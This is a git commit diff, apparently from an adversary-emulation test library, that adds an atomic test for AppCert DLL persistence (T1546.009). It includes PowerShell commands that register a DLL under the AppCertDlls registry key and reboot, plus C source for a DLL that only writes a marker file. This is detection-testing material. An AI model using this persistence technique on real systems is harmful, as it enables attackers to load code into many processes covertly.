T1546.009 (#2009)

* attempt to stop service first, in case its already running * adding T1546.009 * correct T number Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2022-06-23 00:08:15 -04:00
parent 436a980bd2
commit a846bab9b2
5 changed files with 79 additions and 0 deletions
@@ -0,0 +1,24 @@
+attack_technique: T1546.009
+display_name: 'Event Triggered Execution: AppCert DLLs'
+atomic_tests:
+- name: Create registry persistence via AppCert DLL
+  description: |
+    Creates a new 'AtomicTest' value pointing to an AppCert DLL in the AppCertDlls registry key. 
+    Once the computer restarted, the DLL will be loaded in multiple processes and write an 
+    'AtomicTest.txt' file in C:\Users\Public\ to validate that the DLL executed succesfully.
+ 
+    Reference: https://skanthak.homepage.t-online.de/appcert.html
+
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Copy-Item $PathToAtomicsFolder\T1546.009\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll -Force
+      reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls" /v "AtomicTest" /t REG_EXPAND_SZ /d "C:\Users\Public\AtomicTest.dll" /f
+      Restart-Computer
+    cleanup_command: |
+      reg delete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls" /v "AtomicTest" /f
+      Remove-Item C:\Users\Public\AtomicTest.dll -Force
+      Remove-Item C:\Users\Public\AtomicTest.txt -Force
+    name: powershell
+    elevation_required: true
@@ -0,0 +1,52 @@
+/*
+    Atomic Test T1546.009
+
+    Author:  traceflow (Twitter: @traceflow_ Email: traceflow@0x8d.cc)
+             https://github.com/tr4cefl0w
+
+    Credits: https://skanthak.homepage.t-online.de/appcert.html
+*/
+
+
+#include <Windows.h>
+#include <stdio.h>
+
+#pragma comment(lib, "user32")
+
+typedef enum    _REASON
+{
+    PROCESS_CREATION_QUERY   = 1,
+    PROCESS_CREATION_ALLOWED = 2,
+    PROCESS_CREATION_DENIED  = 3
+} REASON;
+
+LPCWSTR target = L"C:\\Windows\\System32\\cmd.exe";
+
+void Run(LPCWSTR lpApplicationName) {
+    CreateFile("C:\\Users\\Public\\AtomicTest.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+    return;
+}
+
+NTSTATUS NTAPI CreateProcessNotify(LPCWSTR lpApplicationName, REASON enReason) {
+    NTSTATUS ntStatus = 0x00000000; // STATUS_SUCCESS
+
+    int result = lstrcmpiW(target, lpApplicationName);
+    if(result) {
+        Run(lpApplicationName);
+    }
+    return ntStatus;
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReversed) {
+    switch ( fdwReason ) {
+        case DLL_PROCESS_ATTACH:
+                        break;
+        case DLL_THREAD_ATTACH:
+                        break;
+        case DLL_THREAD_DETACH:
+                        break;
+        case DLL_PROCESS_DETACH:
+                        break;
+        }
+    return TRUE;
+}
@@ -0,0 +1,2 @@
+EXPORTS
+  CreateProcessNotify
@@ -0,0 +1 @@
+cl.exe /W0 /D_USRDLL /D_WINDLL AtomicTest.c AtomicTest.def /MT /link /DLL /OUT:AtomicTest.dll
				`@@ -0,0 +1 @@`
				`cl.exe /W0 /D_USRDLL /D_WINDLL AtomicTest.c AtomicTest.def /MT /link /DLL /OUT:AtomicTest.dll`